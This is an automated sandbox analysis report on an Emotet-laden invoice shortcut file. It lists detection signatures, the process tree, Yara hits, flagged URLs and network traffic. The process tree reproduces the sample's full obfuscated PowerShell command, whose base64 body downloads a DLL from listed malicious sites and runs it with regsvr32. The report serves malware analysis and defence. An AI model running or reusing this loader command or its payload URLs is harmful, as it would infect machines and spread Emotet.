Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RechnungsDetails 2022.20.05_1044.lnk

Overview

General Information

Sample Name:RechnungsDetails 2022.20.05_1044.lnk
Analysis ID:632057
MD5:235332fd9cf506fd4508ac0fb8d1b64a
SHA1:514f37f2b32eb85d18588f44670830e355c69749
SHA256:6a6547bc259080ecf6b26354da81caaa639216191f5a59d9cc088a2e9597e9c9
Tags:lnk
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7040 cmdline: C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)} MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7100 cmdline: powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 3008 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 6180 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 1592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6244 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
RechnungsDetails 2022.20.05_1044.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x2b3:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x2b3:$r2: p^o^w^e^r^s^h^e^l^l
RechnungsDetails 2022.20.05_1044.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Process Memory Space: powershell.exe PID: 7100INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x2835:$b2: ::FromBase64String(
            • 0x2b90:$b2: ::FromBase64String(
            • 0x128b5:$b2: ::FromBase64String(
            • 0x12f89:$b2: ::FromBase64String(
            • 0x13532:$b2: ::FromBase64String(
            • 0x1388f:$b2: ::FromBase64String(
            • 0x1448d:$b2: ::FromBase64String(
            • 0x149b0:$b2: ::FromBase64String(
            • 0x1ed0a:$b2: ::FromBase64String(
            • 0x1f065:$b2: ::FromBase64String(
            • 0x39363:$b2: ::FromBase64String(
            • 0x43461:$b2: ::FromBase64String(
            • 0x5e4ad:$b2: ::FromBase64String(
            • 0x5e731:$b2: ::FromBase64String(
            • 0x930f7:$b2: ::FromBase64String(
            • 0x93454:$b2: ::FromBase64String(
            • 0x93b08:$b2: ::FromBase64String(
            • 0x941dc:$b2: ::FromBase64String(
            • 0x94825:$b2: ::FromBase64String(
            • 0x94d46:$b2: ::FromBase64String(
            • 0xc7733:$b2: ::FromBase64String(

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.2220000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              4.2.regsvr32.exe.1e40000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.regsvr32.exe.1e40000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.2220000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: RechnungsDetails 2022.20.05_1044.lnkReversingLabs: Detection: 41%
                    Antivirus detection for URL or domain
                    Source: http://digitalkitchen.jp/images/PVn/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196/hUAvira URL Cloud: Label: malware
                    Source: https://173.82.82.196/URL Reputation: Label: malware
                    Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/s64Avira URL Cloud: Label: malware
                    Source: http://piffl.com/piffl.com/a/ity.Avira URL Cloud: Label: malware
                    Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                    Source: http://piffl.com/piffl.com/a/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/temAvira URL Cloud: Label: malware
                    Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: jsonsintl.comVirustotal: Detection: 5%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPMetadefender: Detection: 31%Perma Link
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPReversingLabs: Detection: 40%
                    Machine Learning detection for sample
                    Source: RechnungsDetails 2022.20.05_1044.lnkJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJoe Sandbox ML: detected
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                    Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                    Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
                    Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 06:54:12 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 06:54:13 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b2f9502924=1653288853; expires=Mon, 23-May-2022 06:55:13 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 06:54:13 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
                    Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.5:49782 -> 173.82.82.196:8080
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.667883065.0000027EE4185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.667883065.0000027EE4185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
                    Source: powershell.exe, 00000002.00000002.480786131.000001AFF8FF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527929794.000000000063D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704460917.000000000063D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704786180.0000027EE4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
